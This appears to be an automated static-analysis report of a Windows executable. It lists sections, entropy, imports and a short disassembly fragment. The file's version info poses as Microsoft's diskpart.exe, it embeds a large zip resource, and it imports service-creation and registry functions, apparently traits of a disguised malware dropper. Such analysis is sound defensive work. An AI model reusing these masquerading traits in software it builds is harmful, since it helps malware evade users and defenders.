lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [0040F93Ch]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [004081ACh]
push 0040E004h

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd5a8 | 0x64 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x10000 | 0x349fa0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x1d8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x69b0 | 0x7000 | False | 0.574741908482 | data | 6.4042351061 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x5f70 | 0x6000 | False | 0.578165690104 | data | 6.66357096841 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xe000 | 0x1958 | 0x2000 | False | 0.394287109375 | data | 4.45574950787 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x10000 | 0x349fa0 | 0x34a000 | | | | | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 0x10000

Resources

Name | RVA | Size | Type | Language | Country
XIA | 0x100f0 | 0x349635 | Zip archive data, at least v2.0 to extract | English | United States
RT_VERSION | 0x359728 | 0x388 | data | English | United States
RT_MANIFEST | 0x359ab0 | 0x4ef | exported SGML document, ASCII text, with CRLF line terminators | English | United States

Imports

DLL | Import
KERNEL32.dll | GetFileAttributesW, GetFileSizeEx, CreateFileA, InitializeCriticalSection, DeleteCriticalSection, ReadFile, GetFileSize, WriteFile, LeaveCriticalSection, EnterCriticalSection, SetFileAttributesW, SetCurrentDirectoryW, CreateDirectoryW, GetTempPathW, GetWindowsDirectoryW, GetFileAttributesA, SizeofResource, LockResource, LoadResource, MultiByteToWideChar, Sleep, OpenMutexA, GetFullPathNameA, CopyFileA, GetModuleFileNameA, VirtualAlloc, VirtualFree, FreeLibrary, HeapAlloc, GetProcessHeap, GetModuleHandleA, SetLastError, VirtualProtect, IsBadReadPtr, HeapFree, SystemTimeToFileTime, LocalFileTimeToFileTime, CreateDirectoryA, GetStartupInfoA, SetFilePointer, SetFileTime, GetComputerNameW, GetCurrentDirectoryA, SetCurrentDirectoryA, GlobalAlloc, LoadLibraryA, GetProcAddress, GlobalFree, CreateProcessA, CloseHandle, WaitForSingleObject, TerminateProcess, GetExitCodeProcess, FindResourceA
USER32.dll | wsprintfA
ADVAPI32.dll | CreateServiceA, OpenServiceA, StartServiceA, CloseServiceHandle, CryptReleaseContext, RegCreateKeyW, RegSetValueExA, RegQueryValueExA, RegCloseKey, OpenSCManagerA
MSVCRT.dll | realloc, fclose, fwrite, fread, fopen, sprintf, rand, srand, strcpy, memset, strlen, wcscat, wcslen, __CxxFrameHandler, ??3@YAXPAX@Z, memcmp, _except_handler3, _local_unwind2, wcsrchr, swprintf, ??2@YAPAXI@Z, memcpy, strcmp, strrchr, __p___argv, __p___argc, _stricmp, free, malloc, ??0exception@@QAE@ABV0@@Z, ??1exception@@UAE@XZ, ??0exception@@QAE@ABQBD@Z, _CxxThrowException, calloc, strcat, _mbsstr, ??1type_info@@UAE@XZ, _exit, _XcptFilter, exit, _acmdln, __getmainargs, _initterm, __setusermatherr, _adjust_fdiv, __p__commode, __p__fmode, __set_app_type, _controlfp

Version Infos

Description | Data
LegalCopyright | Microsoft Corporation. All rights reserved.
InternalName | diskpart.exe
FileVersion | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
CompanyName | Microsoft Corporation
ProductName | Microsoft Windows Operating System
ProductVersion | 6.1.7601.17514
FileDescription | DiskPart
OriginalFilename | diskpart.exe
Translation | 0x0409 0x04b0

Possible Origin

Language of compilation system | Country where language is spoken
English | United States